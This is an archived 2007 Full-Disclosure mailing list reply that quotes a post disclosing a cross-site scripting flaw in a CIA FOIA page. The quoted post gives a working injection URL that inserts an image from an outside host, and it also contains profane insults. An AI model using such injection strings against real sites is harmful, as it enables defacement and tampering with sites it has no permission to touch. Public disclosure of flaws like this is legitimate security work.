
Date: Fri, 29 Jun 2007 17:56:15 +0200
From: "Slythers Bro" <slythers@...il.com>
To: "Tonu Samuel" <tonu@....ee>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: XSS in CIA

we don't care

On 6/29/07, Tonu Samuel <tonu@....ee> wrote:
>
> http://www.foia.cia.gov/browse_docs_full.asp?title=foobar%3Cimg%
> 20style='position:absolute;top:10px;left:100px;'%20%
> 20src=http://hosto.ru/znako/ban-prost.gif%3E
>
>
> BTW, f**k you who publish "hashes". If you have nothing to publish, just
> STFU.
>
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/
>

Content of type "text/html" skipped

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
